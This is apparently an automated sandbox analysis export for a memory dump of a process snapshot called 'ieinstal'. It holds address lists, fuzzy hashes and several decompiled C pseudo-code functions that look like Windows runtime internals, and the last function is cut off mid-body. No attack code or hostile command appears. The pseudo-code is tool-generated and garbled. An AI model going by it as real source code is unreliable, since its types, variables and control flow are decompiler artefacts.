0x00000000
0x00000000
0x00000000
0x1f02ea5b
0x1f02ea47
0x1f02ea4e
0x1f02ea4e
0x00000000
0x1f02ea4e
0x1f02ea49
0x1f02ea4c
0x00000000
0x00000000
0x00000000
0x1f02ea4c
0x1f02ea27
0x1f02ea2e
0x1f02ea31
0x00000000
0x1f02ea31
0x1f02ea29
0x1f02ea2c
0x00000000
0x00000000
0x00000000
0x1f02ea2c
0x1f02ea0a
0x1f02ea0c
0x00000000
0x00000000
0x00000000
0x1f02ea7f
0x1f02ea85
0x1f02ea86
0x1f02ea89
0x1f02ea8c
0x1f02ea8f
0x1f02ea8f
0x1f02ea98
0x1f02ea9b
0x1f02eaa0
0x00000000
0x1efecd84
0x1efecd84
0x1efecd88
0x1efecd8a
0x1efecd8d
0x1efecd8f
0x1efecd92
0x1efecd92
0x1efecd95
0x1f02eaaf
0x1f02eab2
0x1f02eab5
0x1f02eab5
0x1efecd9b
0x1efecda1
0x1efecda6
0x1efecdab
0x1f02eae3
0x1f02eae5
0x1f02eaeb
0x1f02eaeb
0x1efecdb1
0x1efecdb3
0x1f02eac1
0x1f02eac4
0x1f02eac6
0x1efecdb9
0x1efecdb9
0x1efecdb9
0x1efecdbf
0x1f02ead0
0x1f02ead5
0x1f02eada
0x1f02eada
0x1efecdbf
0x1efecdcb
0x1efecdcc
0x1efecdcd
0x1efecdce
0x00000000
0x1efecdd1
0x1efecd7e

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
Instruction ID: 2206a94809e693573fcb4bdd45b30859db12e3e3949c11bb07bdc6e7333906dd
Opcode Fuzzy Hash: 5ebf268b46ad65269180af43f6bfb2afc56200d61ec8f7cdedb15c68179d4dfb
Instruction Fuzzy Hash: 17513F76E4024ADBCB14CFA8C9806DEFBF1FB48310F568269D915B7644E635BE41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFF9ABF Relevance: .2, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E1EFF9ABF(void* __ebx, signed int* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t79;
				intOrPtr _t81;
				intOrPtr _t84;
				intOrPtr* _t98;
				intOrPtr _t105;
				signed int* _t108;
				intOrPtr _t116;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t120;
				char* _t122;
				char _t123;
				intOrPtr* _t129;
				intOrPtr _t131;
				intOrPtr _t133;
				intOrPtr _t134;
				void* _t135;

				_t127 = __edi;
				_t120 = __edx;
				_t108 = __ecx;
				_t106 = __ebx;
				_push(0x34);
				_push(0x1f09c978);
				E1F017BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t135 - 0x2c)) = __edx;
				 *((intOrPtr*)(_t135 - 0x3c)) = __ecx;
				 *((intOrPtr*)(_t135 - 0x1c)) = 0xc0000001;
				_t131 =  *((intOrPtr*)(_t135 + 0x10));
				if(_t131 != 0) {
					_t79 =  *(_t131 + 0x1c);
				} else {
					_t79 = 0;
				}
				 *(_t135 - 0x24) = _t79;
				if(_t108 == 0 ||  *((intOrPtr*)(_t135 + 8)) == 0 || _t120 == 0 || (_t79 & 0xfffffffc) != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					E1F094A6D(_t106, _t108, _t120, _t127, _t131);
					_t81 = 0xc000000d;
					goto L22;
				} else {
					 *_t108 =  *_t108 & 0x00000000;
					_t84 =  *0x1f0b6644; // 0x0
					_t88 = E1EFD5D90(_t108,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t84 + 0x00080000 | 0x00000008, 0xb8);
					 *((intOrPtr*)(_t135 - 0x30)) = _t88;
					_t129 = _t88;
					 *((intOrPtr*)(_t135 - 0x20)) = _t129;
					 *(_t135 - 4) =  *(_t135 - 4) & 0x00000000;
					 *((intOrPtr*)(_t135 - 0x38)) = 1;
					_t146 = _t129;
					if(_t129 == 0) {
						_t133 = 0xc0000017;
						 *((intOrPtr*)(_t135 - 0x1c)) = 0xc0000017;
						L19:
						 *(_t135 - 4) = 0xfffffffe;
						 *((intOrPtr*)(_t135 - 0x38)) = 0;
						E1EFF9CCF(_t88, _t129, _t133);
						if(_t133 >= 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t135 - 0x3c)))) = _t129;
						}
						_t81 = _t133;
						L22:
						 *[fs:0x0] =  *((intOrPtr*)(_t135 - 0x10));
						return _t81;
					}
					_t129 =  *((intOrPtr*)(_t135 - 0x20));
					 *((intOrPtr*)(_t129 + 0x9c)) =  *((intOrPtr*)(_t135 + 4));
					 *((intOrPtr*)(_t135 - 0x28)) = _t129 + 0x30;
					_push(0x1ef913d0);
					_push( *(_t135 - 0x24));
					_push(_t131);
					_t133 = E1EFC4AB1(_t106, _t129 + 0x30,  *((intOrPtr*)(_t135 + 0xc)), _t129, _t131, _t146);
					 *((intOrPtr*)(_t135 - 0x1c)) = _t133;
					if(_t133 < 0) {
						goto L19;
					}
					 *(_t135 - 4) = 1;
					 *((intOrPtr*)(_t135 - 0x34)) = 1;
					 *((intOrPtr*)(_t129 + 0x60)) =  *((intOrPtr*)(_t135 + 8));
					 *(_t129 + 0xb4) = 0 |  *((intOrPtr*)(_t135 + 0x14)) != 0x00000000 |  *(_t129 + 0xb4) & 0xfffffffe;
					_t134 =  *((intOrPtr*)(_t135 - 0x2c));
					 *((intOrPtr*)(_t129 + 0xa8)) = _t134;
					_t115 =  *((intOrPtr*)(_t129 + 0x8c));
					 *((intOrPtr*)(_t129 + 0x20)) = E1EFC6E00;
					_t122 = _t129 + 0x28;
					if( *((intOrPtr*)(_t129 + 0x8c)) == 0) {
						 *(_t129 + 0x24) =  *(_t129 + 0x24) & 0x00000000;
						 *_t122 = 0;
						_t116 = 0;
						_t123 = 0;
					} else {
						E1EFC4A09(_t115, _t129 + 0x24, _t122);
						_t105 =  *((intOrPtr*)(_t135 - 0x30));
						_t116 =  *((intOrPtr*)(_t105 + 0x24));
						_t123 =  *((intOrPtr*)(_t105 + 0x28));
					}
					 *(_t129 + 0x14) =  *(_t129 + 0x14) & 0x00000000;
					_t98 = _t129 + 0x18;
					 *((intOrPtr*)(_t98 + 4)) = _t98;
					 *_t98 = _t98;
					 *_t129 = 0x1ef91088;
					 *((intOrPtr*)(_t129 + 4)) = _t116;
					 *((char*)(_t129 + 8)) = _t123;
					_t117 =  *((intOrPtr*)(_t129 + 0x8c));
					 *((intOrPtr*)(_t135 - 0x30)) = _t117;
					if(_t117 == 0) {
						L28:
						_t99 = E1F094A6D(_t106, _t117, _t123, _t129, _t134);
						_t133 = 0xc000000d;
						goto L15;
					} else {
						if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
							_t129 =  *((intOrPtr*)(_t135 - 0x20));
							goto L28;
						} else {
							 *((intOrPtr*)(_t135 - 0x40)) =  *((intOrPtr*)(_t117 + 0x28));
							_t129 =  *((intOrPtr*)(_t135 - 0x20));
							 *((intOrPtr*)(_t135 - 0x44)) = _t129;
							_push(8);
							_push(_t135 - 0x44);
							_push(2);
							_push(_t134);
							_t133 = E1F003280();
							if(_t133 >= 0) {
								_t99 = E1EFC491F( *((intOrPtr*)(_t135 - 0x30)), 1);
								_t133 = 0;
							}
							L15:
							 *((intOrPtr*)(_t135 - 0x1c)) = _t133;
							if(_t133 >= 0) {
								_t133 = 0;
								 *((intOrPtr*)(_t135 - 0x1c)) = 0;
								_t99 =  *((intOrPtr*)(_t135 + 0x10));
								_t118 =  *((intOrPtr*)(_t135 - 0x28));
								if(_t99 != 0) {
									 *((intOrPtr*)(_t118 + 0x10)) = _t99;
								}
								if( *((intOrPtr*)(_t118 + 8)) != _t133) {
									_t99 = E1EFF73B3(_t106, _t118, _t129, _t133, __eflags);
								}
							}
							 *(_t135 - 4) =  *(_t135 - 4) & 0x00000000;
							 *((intOrPtr*)(_t135 - 0x34)) = 0;
							_t88 = E1EFF9CC4(_t99, _t129, _t133);
							goto L19;
						}
					}
				}
			}

0x1eff9abf
0x1eff9abf
0x1eff9abf
0x1eff9abf
0x1eff9abf
0x1eff9ac1
0x1eff9ac6
0x1eff9acb
0x1eff9ace
0x1eff9ad1
0x1eff9ad8
0x1eff9add
0x1eff9cb4
0x1eff9ae3
0x1eff9ae3
0x1eff9ae3
0x1eff9ae5
0x1eff9aea
0x1f036009
0x1f03600e
0x00000000
0x1eff9b20
0x1eff9b20
0x1eff9b23
0x1eff9b3f
0x1eff9b44
0x1eff9b47
0x1eff9b49
0x1eff9b4c
0x1eff9b50
0x1eff9b57
0x1eff9b59
0x1f035f8e
0x1f035f93
0x1eff9c84
0x1eff9c84
0x1eff9c8b
0x1eff9c92
0x1eff9c99
0x1eff9c9e
0x1eff9c9e
0x1eff9ca0
0x1eff9ca2
0x1eff9ca5
0x1eff9cb1
0x1eff9cb1
0x1eff9b62
0x1eff9b65
0x1eff9b6e
0x1eff9b71
0x1eff9b76
0x1eff9b79
0x1eff9b84
0x1eff9b86
0x1eff9b8b
0x00000000
0x00000000
0x1eff9b94
0x1eff9b97
0x1eff9b9d
0x1eff9bb3
0x1eff9bb9
0x1eff9bbc
0x1eff9bc2
0x1eff9bc8
0x1eff9bcf
0x1eff9bd4
0x1f035f9b
0x1f035f9f
0x1f035fa2
0x1f035fa4
0x1eff9bda
0x1eff9bde
0x1eff9be3
0x1eff9be6
0x1eff9be9
0x1eff9be9
0x1eff9bec
0x1eff9bf0
0x1eff9bf3
0x1eff9bf6
0x1eff9bf8
0x1eff9bfe
0x1eff9c01
0x1eff9c04
0x1eff9c0a
0x1eff9c0f
0x1f035fae
0x1f035fae
0x1f035fb3
0x00000000
0x1eff9c15
0x1eff9c22
0x1f035fab
0x00000000
0x1eff9c28
0x1eff9c2b
0x1eff9c2e
0x1eff9c31
0x1eff9c34
0x1eff9c39
0x1eff9c3a
0x1eff9c3c
0x1eff9c42
0x1eff9c46
0x1eff9c4e
0x1eff9c53
0x1eff9c53
0x1eff9c55
0x1eff9c55
0x1eff9c5a
0x1eff9c5c
0x1eff9c5e
0x1eff9c61
0x1eff9c64
0x1eff9c69
0x1eff9cbf
0x1eff9cbf
0x1eff9c6e
0x1f035fbd
0x1f035fbd
0x1eff9c6e
0x1eff9c74
0x1eff9c78
0x1eff9c7f
0x00000000
0x1eff9c7f
0x1eff9c22
0x1eff9c0f

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9992219d7713731d54fde620ef84f0f50326a23b30615a5232c9d02afa4f70fa
Instruction ID: 517c8fb2f4951808b2e996df1a345d0bdd5f8f97dfd79ab30c2216fc18567b87
Opcode Fuzzy Hash: 9992219d7713731d54fde620ef84f0f50326a23b30615a5232c9d02afa4f70fa
Instruction Fuzzy Hash: C9618BB6E11656DFDB05CFA8C950B9DBBF0BF48720F15825AE819AB360D735A900CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1F07BB40 Relevance: .2, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F07BB40(signed int __ecx, void* __edx, intOrPtr _a4, short _a8) {
				char _v5;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr _t58;
				signed int _t60;
				signed int _t63;
				signed int _t65;
				char _t71;
				void* _t74;
				char _t78;
				signed int _t85;
				signed int _t86;
				char _t95;
				intOrPtr _t97;
				signed int _t102;
				signed int _t106;
				void* _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				char _t112;
				void* _t114;
				void* _t117;

				_t96 = __ecx;
				_t58 = _a4;
				_t95 = 0;
				_v12 = __ecx;
				_t112 = 0;
				if(_t58 != 1) {
					if(_t58 != 3) {
						if(_t58 != 2) {
							L37:
							return 0;
						}
						_t60 = _a8;
						if(_t60 < 0) {
							goto L37;
						}
						_t97 =  *((intOrPtr*)(__ecx + 0x14));
						_t106 = _t60;
						if(_t106 >= ( *(_t97 + 6) & 0x0000ffff)) {
							goto L37;
						}
						_t63 = _t106 * 0x1c +  *((intOrPtr*)(_t97 + 0xc));
						L3:
						return _t63 & 0xffffff00 | _t117 == 0x00000000;
					}
					_t65 =  *(__edx + 6) & 0x0000ffff;
					_v16 = 0;
					if(_t65 < 0) {
						if( *(__edx + 4) == 0) {
							goto L37;
						}
						_t107 = 0x55;
						_t112 = E1EFBD818(__ecx, _t107);
						if(_t112 == 0) {
							goto L37;
						}
						_v16 = _t112;
						_v20 = 0xaa0000;
						if(E1EFE4F40( *(__edx + 4) & 0x0000ffff,  &_v20) == 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t112);
							goto L37;
						}
						_t114 = _a8;
						L25:
						_t109 =  *((intOrPtr*)(_v12 + 0x18));
						if(_t109 == 0 || _t114 < 0) {
							L29:
							_t71 = _t95;
							goto L30;
						} else {
							_t102 = _t114;
							if(_t102 >= ( *(_t109 + 6) & 0x0000ffff)) {
								goto L29;
							}
							_t71 =  *((intOrPtr*)(_t109 + 0x10)) +  *( *((intOrPtr*)(_t109 + 0xc)) + _t102 * 2) * 2;
							L30:
							if(_t71 == 0) {
								L32:
								_v5 = _t95;
								L33:
								if(_t112 != 0) {
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t95, _t112);
								}
								return _v5;
							}
							_t74 = E1F0079A0(_v16, _t71);
							_v5 = 1;
							if(_t74 == 0) {
								goto L33;
							}
							goto L32;
						}
					}
					_t114 = _a8;
					if(_t65 != _t114) {
						_t110 =  *((intOrPtr*)(__ecx + 0x18));
						if(_t110 == 0) {
							L18:
							_t78 = _t95;
							L19:
							if(_t78 == 0) {
								goto L37;
							}
							E1F005050(_t96,  &_v20, _t78);
							goto L25;
						}
						_t96 = _t65;
						if(_t96 >= ( *(_t110 + 6) & 0x0000ffff)) {
							goto L18;
						}
						_t78 =  *((intOrPtr*)(_t110 + 0x10)) + _t96 * 2;
						goto L19;
					}
					return 1;
				}
				_t85 =  *(__edx + 4) & 0x0000ffff;
				if(_t85 == 0) {
					_t86 =  *(__edx + 6) & 0x0000ffff;
					if(_t86 < 0) {
						goto L37;
					}
					_t111 =  *((intOrPtr*)(__ecx + 0x18));
					if(_t111 != 0) {
						_t96 = _t86;
						if(_t96 < ( *(_t111 + 6) & 0x0000ffff)) {
							_t95 =  *((intOrPtr*)(_t111 + 0x10)) + _t96 * 2;
						}
					}
					if(_t95 == 0) {
						goto L37;
					} else {
						E1F005050(_t96,  &_v20, _t95);
						if(E1EFE56E0( &_v20,  &_v12) == 0) {
							goto L37;
						}
						_t63 = _v12;
						goto L3;
					}
				}
				_t63 = _a8;
				_t117 = _t85 - _t63;
				goto L3;
			}

0x1f07bb40
0x1f07bb48
0x1f07bb4d
0x1f07bb4f
0x1f07bb55
0x1f07bb59
0x1f07bbd3
0x1f07bce2
0x1f07bcd7
0x00000000
0x1f07bcd7
0x1f07bce4
0x1f07bceb
0x00000000
0x00000000
0x1f07bced
0x1f07bcf0
0x1f07bcf9
0x00000000
0x00000000
0x1f07bcfe
0x1f07bb6c
0x00000000
0x1f07bb6c
0x1f07bbd9
0x1f07bbdd
0x1f07bbe3
0x1f07bc30
0x00000000
0x00000000
0x1f07bc38
0x1f07bc3e
0x1f07bc42
0x00000000
0x00000000
0x1f07bc51
0x1f07bc54
0x1f07bc62
0x1f07bcd2
0x00000000
0x1f07bcd2
0x1f07bc64
0x1f07bc68
0x1f07bc6b
0x1f07bc70
0x1f07bc91
0x1f07bc91
0x00000000
0x1f07bc77
0x1f07bc7b
0x1f07bc80
0x00000000
0x00000000
0x1f07bc8c
0x1f07bc93
0x1f07bc95
0x1f07bcaa
0x1f07bcaa
0x1f07bcad
0x1f07bcaf
0x1f07bcbd
0x1f07bcbd
0x00000000
0x1f07bcc2
0x1f07bc9b
0x1f07bca0
0x1f07bca8
0x00000000
0x00000000
0x00000000
0x1f07bca8
0x1f07bc70
0x1f07bbe5
0x1f07bbec
0x1f07bbf5
0x1f07bbfa
0x1f07bc16
0x1f07bc16
0x1f07bc18
0x1f07bc1a
0x00000000
0x00000000
0x1f07bc25
0x00000000
0x1f07bc25
0x1f07bbfc
0x1f07bc05
0x00000000
0x00000000
0x1f07bc11
0x00000000
0x1f07bc11
0x00000000
0x1f07bbee
0x1f07bb5b
0x1f07bb62
0x1f07bb74
0x1f07bb7b
0x00000000
0x00000000
0x1f07bb81
0x1f07bb86
0x1f07bb88
0x1f07bb91
0x1f07bb9d
0x1f07bb9d
0x1f07bb91
0x1f07bba2
0x00000000
0x1f07bba8
0x1f07bbad
0x1f07bbc1
0x00000000
0x00000000
0x1f07bbc7
0x00000000
0x1f07bbcb
0x1f07bba2
0x1f07bb66
0x1f07bb6a
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae01c3fd95582de9779016b234f99c0438632d43d7d65269239a59648bef338
Instruction ID: 56566aac46f37d16e469f2fb02cafe51e0c11646dbe55d440a675eeba71aeaa1
Opcode Fuzzy Hash: fae01c3fd95582de9779016b234f99c0438632d43d7d65269239a59648bef338
Instruction Fuzzy Hash: 6851FBB960094A9ACB04DF64C490ABEB7F5BF40740B89C2EEDEC08B509EF34E942C754

Uniqueness

Uniqueness Score: -1.00%

Function 1EFB7C85 Relevance: .2, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E1EFB7C85(char __ecx) {
				short* _v20;
				void* _v28;
				char _v29;
				void* _v32;
				intOrPtr* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E1EFCFED0(0x1f0b5b40);
					_t104 =  *0x1f0b6390; // 0x3332f08
					if(_t104 == 0) {
						_t49 = 0;
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x30000000
					_push(0x1f0b5b40);
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E1EFCE740(_t93);
					if( *((char*)(_t108 + 0xf)) == 0) {
						L5:
						_t49 = _t104;
						break;
					}
					_t101 =  *0x7ffe02dc;
					if(( *(_t104 + 0x14) & 0x00000001) != 0 || 0x7ffe02dc != _v20) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0x90028);
						_push(_t108 + 0x20);
						_push(0);
						_push(0);
						_push(0);
						_t10 = _t104 + 4; // 0x0
						_push( *_t10);
						_t53 = E1F002D40();
						__eflags = _t53;
						if(_t53 >= 0) {
							__eflags =  *(_t104 + 0x14) & 0x00000001;
							if(( *(_t104 + 0x14) & 0x00000001) == 0) {
								E1EFCFED0(0x1f0b5b40);
								_push(0x1f0b5b40);
								 *((intOrPtr*)(_t104 + 8)) = _t101;
								E1EFCE740(0);
							}
							goto L5;
						}
						__eflags = _t53 - 0xc0000012;
						if(__eflags == 0) {
							L11:
							_t11 = _t104 + 0xe; // 0x332f2002
							_t13 = _t104 + 0xc; // 0x3332f15
							_t93 = _t13;
							 *((char*)(_t108 + 0x12)) = 0;
							__eflags = E1EFF41BB(_t13,  *_t11 & 0x0000ffff, __eflags, _t108 + 0x10);
							if(__eflags >= 0) {
								L14:
								_t102 =  *((intOrPtr*)(_t108 + 0x10));
								 *_t102 = 2;
								_v20 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
								E1EFCFED0(0x1f0b5b40);
								__eflags =  *0x1f0b6390 - _t104; // 0x3332f08
								if(__eflags == 0) {
									__eflags =  *((char*)(_t108 + 0xe));
									_t95 = _v20;
									 *0x1f0b6390 = _t102;
									_t32 = _t102 + 0xc; // 0x0
									 *_t95 =  *_t32;
									_t33 = _t102 + 0x10; // 0x0
									 *((intOrPtr*)(_t95 + 4)) =  *_t33;
									_t35 = _t102 + 4; // 0xffffffff
									 *((intOrPtr*)(_t95 + 8)) =  *_t35;
									if(__eflags != 0) {
										_t37 = _t104 + 0x10; // 0x2003332f
										_t95 =  *((intOrPtr*)( *_t37));
										E1F03D87C(_t89,  *((intOrPtr*)( *_t37)), __eflags);
									}
									_push(0x1f0b5b40);
									E1EFCE740(_t95);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t38 = _t104 + 4; // 0x0
										_push( *_t38);
										E1F002A80();
										E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 = _v36;
									}
									asm("lock xadd [esi], ebx");
									__eflags = _t89 == 1;
									if(_t89 == 1) {
										_t41 = _t104 + 4; // 0x0
										_push( *_t41);
										E1F002A80();
										E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 = _v36;
									}
									_t49 = _t102;
									break;
								}
								_push(0x1f0b5b40);
								E1EFCE740(_t93);
								asm("lock xadd [esi], eax");
								if(__eflags == 0) {
									_t25 = _t104 + 4; // 0x0
									_push( *_t25);
									E1F002A80();
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
									_t102 = _v36;
								}
								 *_t102 = 1;
								asm("lock xadd [edi], eax");
								if(__eflags == 0) {
									_t28 = _t102 + 4; // 0xffffffff
									_push( *_t28);
									E1F002A80();
									E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
								}
								continue;
							}
							_t15 = _t104 + 0x10; // 0x2003332f
							_t93 = _t108 + 0x18;
							_t17 = _t104 + 0xe; // 0x332f2002
							 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
							_t85 = 6;
							 *((short*)(_t108 + 0x18)) = _t85;
							_t87 = E1EFF41BB(_t108 + 0x18,  *_t17 & 0x0000ffff, __eflags, _t108 + 0x10);
							__eflags = _t87;
							if(_t87 < 0) {
								goto L5;
							}
							 *((char*)(_t108 + 0xe)) = 1;
							goto L14;
						}
						__eflags = _t53 - 0xc000026e;
						if(__eflags != 0) {
							goto L5;
						}
						goto L11;
					} else {
						goto L5;
					}
				}
				return _t49;
			}

0x1efb7c85
0x1efb7c8d
0x1efb7c90
0x1efb7c93
0x1efb7c97
0x1efb7c9a
0x1efb7c9f
0x1efb7ca4
0x1efb7cac
0x1efb7ced
0x1efb7cef
0x1efb7cef
0x1efb7cae
0x1efb7cb1
0x1efb7cb4
0x1efb7cb9
0x1efb7cbd
0x1efb7cc7
0x1efb7ce4
0x1efb7ce4
0x00000000
0x1efb7ce4
0x1efb7cce
0x1efb7cd4
0x1f01b0a6
0x1f01b0a7
0x1f01b0a8
0x1f01b0a9
0x1f01b0aa
0x1f01b0af
0x1f01b0b0
0x1f01b0b1
0x1f01b0b2
0x1f01b0b3
0x1f01b0b3
0x1f01b0b6
0x1f01b0bb
0x1f01b0bd
0x1f01b231
0x1f01b235
0x1f01b241
0x1f01b246
0x1f01b247
0x1f01b24a
0x1f01b24a
0x00000000
0x1f01b235
0x1f01b0c3
0x1f01b0c8
0x1f01b0d5
0x1f01b0d5
0x1f01b0de
0x1f01b0de
0x1f01b0e1
0x1f01b0eb
0x1f01b0ed
0x1f01b11d
0x1f01b123
0x1f01b132
0x1f01b138
0x1f01b13c
0x1f01b141
0x1f01b147
0x1f01b1a8
0x1f01b1ad
0x1f01b1b1
0x1f01b1b7
0x1f01b1bb
0x1f01b1be
0x1f01b1c1
0x1f01b1c4
0x1f01b1c7
0x1f01b1ca
0x1f01b1cc
0x1f01b1cf
0x1f01b1d2
0x1f01b1d2
0x1f01b1d7
0x1f01b1dc
0x1f01b1e3
0x1f01b1e7
0x1f01b1e9
0x1f01b1e9
0x1f01b1ec
0x1f01b1fd
0x1f01b202
0x1f01b202
0x1f01b206
0x1f01b20a
0x1f01b20b
0x1f01b20d
0x1f01b20d
0x1f01b210
0x1f01b221
0x1f01b226
0x1f01b226
0x1f01b22a
0x00000000
0x1f01b22a
0x1f01b149
0x1f01b14e
0x1f01b155
0x1f01b159
0x1f01b15b
0x1f01b15b
0x1f01b15e
0x1f01b16f
0x1f01b174
0x1f01b174
0x1f01b178
0x1f01b180
0x1f01b184
0x1f01b18a
0x1f01b18a
0x1f01b18d
0x1f01b19e
0x1f01b19e
0x00000000
0x1f01b184
0x1f01b0ef
0x1f01b0f2
0x1f01b0f6
0x1f01b0fc
0x1f01b100
0x1f01b101
0x1f01b10b
0x1f01b110
0x1f01b112
0x00000000
0x00000000
0x1f01b118
0x00000000
0x1f01b118
0x1f01b0ca
0x1f01b0cf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1efb7cd4
0x1efb7cec

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05207ccbee5249f555a14de759869a0f8bd0ab2908b69ffe0698753c2206c522
Instruction ID: 2a1b094ea93d15b069c9212d3640f57ccd41817078e8bfa7368a63f57483a40a
Opcode Fuzzy Hash: 05207ccbee5249f555a14de759869a0f8bd0ab2908b69ffe0698753c2206c522
Instruction Fuzzy Hash: 8A51C9B5109782ABD322DF24C850F1ABBE4FF44714F180A5EF8959B691E735F848CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEAD20 Relevance: .2, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 40%

			E1EFEAD20(intOrPtr _a4, signed int** _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				signed int _t51;
				signed int _t59;
				unsigned int _t64;
				unsigned int _t75;
				signed int _t76;
				void* _t81;
				signed int* _t82;
				signed int _t85;
				signed int _t86;
				intOrPtr _t88;
				signed int _t89;
				signed int _t91;
				signed int* _t93;
				void* _t108;

				_t85 = _a12;
				_v12 = _v12 & 0x00000000;
				if((_t85 & 0xfffffff8) != 0 || (_t85 & 0x00000005 & (_t85 & 0x00000005) - 0x00000001) != 0) {
					L26:
					return 0xc00000f1;
				} else {
					_t41 = _t85 & 0x00000002;
					_v20 = _t41;
					_t91 = _t85 & 1;
					if(_t41 != 0) {
						__eflags = _t91;
						if(_t91 != 0) {
							goto L3;
						}
						goto L26;
					}
					L3:
					_t88 = _a4;
					if(_t88 != 0) {
						_t86 = _t85 & 0x00000004;
						__eflags = _t86;
						if(_t86 == 0) {
							L6:
							if(_t86 != 0) {
								L19:
								_t81 = 4;
								_t82 = E1EFEB9FA(_t81);
								__eflags = _t82;
								if(_t82 == 0) {
									return 0xc000009a;
								}
								 *_t82 =  *_t82 & 0x00000000;
								 *_a8 = _t82;
								L17:
								return 0;
							}
							if(_t88 != 0) {
								_v8 = _v8 & 0x00000000;
								_v16 = _t91 ^ 1;
								_t75 = E1EFEBA17(_t88, _t91 ^ 1);
								while(1) {
									L9:
									_t84 = _t75;
									_t93 = E1EFEB9FA(_t75);
									if(_t93 == 0) {
										break;
									}
									if(_v8 != 1) {
										L13:
										if(_v16 != 1) {
											__eflags = _v20;
											_push(_t75 >> 1);
											_push(_t88);
											_push(0);
											_push(_t75);
											_push(_t93);
											if(__eflags != 0) {
												_t51 = E1EFBAD10(_t75, _t88, __eflags);
											} else {
												_t51 = E1EFF1E80(_t75, _t88, _t93);
											}
											_t89 = _t51;
											__eflags = _t89;
											if(_t89 >= 0) {
												L16:
												 *_a8 = _t93;
												goto L17;
											} else {
												E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t93);
												L35:
												return _t89;
											}
										}
										E1F0088C0(_t93, _t88, _t75);
										if(_v8 == 1) {
											_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
											E1EFCE740(_t84);
										}
										goto L16;
									}
									_t84 =  *[fs:0x30];
